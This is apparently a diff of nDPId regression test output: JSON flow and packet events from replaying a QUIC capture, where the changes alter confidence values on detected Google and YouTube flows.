-00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":130,"packets-processed":129,"total-skipped-flows":0,"total-l4-payload-len":174150,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":90,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":90,"total-idle-flows":89,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":405,"global_ts_msec":1621495911385} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1621495911385,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495911385,"pkt":"AAAAAAAAAAEAS1QMCABFAAViZVRAAH4R9mOokEAFCUGp\/P6iAbsFTuJkwv8AAB0ISXF10ZCPcZ8ANwCrCJzLpozLw4lUkkdlAQ6gxDr15gnzrPDGY+5Es7Rj4OEug7GPyeqPD2P7ep04DtKE\/arcjWhE\/TeK9i4OFMtcnTbxJLT+Ie\/sDxN+8rr9EpWTbrHR6DrOgebE9CnNf9TmE3FgFzE1oavAS0XPwmTIIdH8DlasdxYKazZ2\/Vbz3SE0UaIlbXgmou7suHpa04zHS3u5e9ZyWoFTxGTtw4WSnPz3ZKKkluQDu\/BtGXK0Nw2vkZHZvHI5lbvjogi7BhIgmeQsuujAYnjK\/8JvDzTmbaLJnfI0BPAzgpLAyl5Uc2gG\/KhKxSiYKBAPLQlIw6PFn0Lw49hevbrWvRHOrE9CLjmKoraWxDJ\/mALo4XhOb\/38Fr\/hKdvS3J0EgxlCXTb2thu6vO6TuyRCkuufEdAjYJ1vuqyiJCtFCAuUx7f18Eb4YEnOwiDxAbC3vGkfxkILkOjo6zw0CLRXf8nS\/NGBDwLWigrT+llhvmIHUFzlv9UH+xnKwzw\/egOFElPuDQWAHnu+onEYr+xarKfPXzcUZ2mJ8x2qVU8DnquJVsvWPKVTkAEBNrppoG89a28TVbihC9GQZrxGFJfKiDfU\/pEjYGoEkpc0EmKP6WcJTrq8AjU9GqT8Otws\/2IJyr6eRQmrOEnR61BpA68BS2gZETtHAFeV+7SvjjISU7v1iOrwnLh5PVhV2I3Yg++07Mh3uzcKBBpCykABy4RIzFtFfD0mgpctccbji0EH0ftvDOPuyet7rGzNJxhlJE5822+Xl3TP9GlIFWuu44I+7Awm4hQYyx6SZMm5VkB1u+AQoAVC5yMuqM\/oqccmH3ov\/Y0J8XBnYLvKXGFZN6w2Ie6AwP0RMVPR4KQrpr7QbTjZ1gqRIH\/gSQZm2lG3NnFEcauzrfT+UAJCMrcsBthQQ4GFi4GLid84Wo3e01Yrsz68cR\/Dgyy9EjPbiFW4MTikaH6+JGXf6NLD1CBuUsZVLsd0wLuOp+mdcUObLIIhYByY+ZgC+pokGwX4+0M17gKxSBYArJDBxXe5y9O3GJkG2iDua1ffTw4GMCTWjg\/R2g3bNlRt2Kdpw0gNsexLTtD4vFIhhqYc5yzqubTAWDS97RiK0ff82cdVn+d1axfVYDUVVOuPm8ks3AoXLvMXz0uwOT1I7eZMtFaHeThWMFitpjMx4373HtevJV+R5JNzCQnbUkKMTjHvihPPw5JObhnamIan7J5a0S1j0TBlprZNVWcpdmTBKK9FiCYUebSphRa9ldAHRwzqCWNqZR\/NnSxOGm\/diizPFOGmgelkIA+7xLYtK7TLNkZ6WWwfmMdAfmJXz152dGSsptNpHU7WmssMjos9x0nJPItQNMAxpvgaTkatuyFUAnSEa\/kG2dwBsqrcrwjs\/mFLXB5BDHAaGdSx+C7zjjhFvObf79qhHZ7JrOH0IFeQgRTI\/I\/N1E\/wA3O\/VVPfi5T2WZv1WQoakLeMywD1DSZddBLRgEj9HiaWe\/6WOpSn\/V\/zM+Gime9loFOdLfGpXUiurZsHPqUL1b6MPeMrtR937yF4HPz5BY+\/tSnZ01u2ik8yu9Q5AJ4CmdPfTqD4sA\/UJgRLpffrp7JIFjyUbElKxtMBDr0WSdiYnf1+TQzqqaiOCpGsNMZoe9ogrQfFW7\/gdsykD2QZJgD7hTY\/mVqzcE88T3Zcf5TxTTDINI4atIY1lYydToKknzxOdKjXEcoGNF2fxUyQPRMk\/YqD0njsh1Dp+iMP\/G3eoOFqy1\/r1bbUJxo+NSb1V8JoUh0VwlVF0mFL"} -00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1621496172813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621496172813,"pkt":"AAAAAAAAAAEA4PSECABFAAViwpdAAH4RVxyokEAFXWSX3c7OAbsFTudOyP8AAB0IJfFU5PX57qcAAEU0c0zbXMVn6Pcd4e7ZmfGe\/qxoruMGwPYAlsdY4bBFIJBxlfIjvR+3r8n\/O3U+qJTKKUq8qa0QleuYrfTMsn8O\/y7hixYXl+TzY\/2tPZFmjgWjPy8Q3ousCTGpMjiPdDu1aKCA8puIhbArl8N6Da6NPpGg72zv38j3AEI+JJUvltWracNeEqzqLjSdIseAljbdck9dGPDQn0DHp\/nLF0OQLhgPW7is5GRoEeUyeCGTQitO7sJ+0GFP4Tawvy3HpIB8sQ\/mvWQBI36+Vr0IvUC92N81WsKioT12i3z0lrAFRKc2nrIsK9qzHEDcHRWO8IWXX8n7Ylt6igAVfNRjEBAM2NXSGElvaDPhl5W14nFw2qReuostjw9VWKaXa0YpEemQwzzCdWf\/l2eJ\/wYr+I8wfqvsxZTTgvvVqGvZbvCnJarMpvykClV78Fjr7zdoJH0h6e4wj\/zK66Jl9dPkQ7jrAIn8Djc77n3JalsxT45E5h\/vwJ6Hy1Yu62tVg0onyAEaJRgShAbt65WHHuuOjUbOO7SgM\/l1B3NkYxFQRjbPkOp7\/+btlneTdmAOHcL660GLIGJvYuSg3GxeNY\/RvOuUCpKgbpyQvoy56KwcUUR0q+ZfCEfPOk+4i3eO9doEvGZqOHv6OheClMqNVyw4H6sb5ovkDq\/C4Luz4OZtiQxZAB9o8Z+XJbrSEebIisx\/MMDHqbWhehe1Eg0mRwnSpSkDsUCYcCDmBZZpNGxtE8k+8ji5vCVnS5atqC1q22zlTPttfegwTwCR34A50P0f\/cSq+ZjRg8lUGBiJMY633IK0UkUJK3qD2M+BLuyIwMRCQaYB5FWwQptU0wzlZlcAZTHpnhVpthl5\/8JNWtmRYqhefl5vburajPxYg4gOqVoHDVonhwMZ\/I71i2OZh\/xUUB+2rkwL41c5gUjryBwPqx6xlbPDXfHRijhx6FEeECng0ZOpqAj4GzPzd+hfEZoL+A\/zpIFLSkxIkmdjto2cmeEjcK2ZmzuUECn2TbWRXdwA0raRmtbKwoHqebinUG4Zd73sgqZPzhb6S6fRcJFXth6D1WkWMX\/pmvTBFmwsZtj4vIKhZgtGCFvnCsFQjZwKMGDdk8IcMtc7fRP\/WFw138PAOKXN4\/cwBXBJiHWUsfHmH4IEa3yYTAmTO5bAv3vbyW7AGUPPSZsFuGjThPYUOEo4obqTwpRd+7G7Fj8PTDc9\/SuvOHeEFG8SNmZczyUVz7P\/pwxY9P0pFzlzfGNZ1Yf7NIqIcuZwIAu1QHM8TKxiNpKLXkwY5gWi5EHkWT7ieNOA\/PME3V7yn6j9jdSLAgF1RLKr0bwOhlmrTCeyjtBkecLPxW\/ZpUJSAVdMBzXR4O9Zh2\/3JmabiOVhFtw1hF3o2eH8fM2+XAKwoI8UVoKaXC5im6tL\/RAIV7zKy5boKMeRbQM9fQyx\/xdvgnYYAepCXa5LMPTBjm8XbDITPP1e5aEovXRZlii1OC0w0plqCde8kUQfkZW0LCgurP5FzP2Aui0bpTHOGUVN1ugsbXrtv40HL7weMrKI+pmagU+tsECSDoFrx7+qtDT0YFo235yejWP4S7BEg\/McKYbD5TUBYFtwlDeTjyPkNpblYnvhSMMuhXgVIEl+Jn3adbs96ij4KSAIxF\/p\/twgKC3\/qYYlDHvYQriXuCWK9963IJqD8REoU72BQdfNgjTgbXB0ZOu7ItHmtPuAN9cWJ\/uL2kM5RxQU\/UDcei+A\/uNYyRIl3aPttcTgFoW4dVR1MlFwi\/UvUZjaUxjT"} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients2.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients2.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 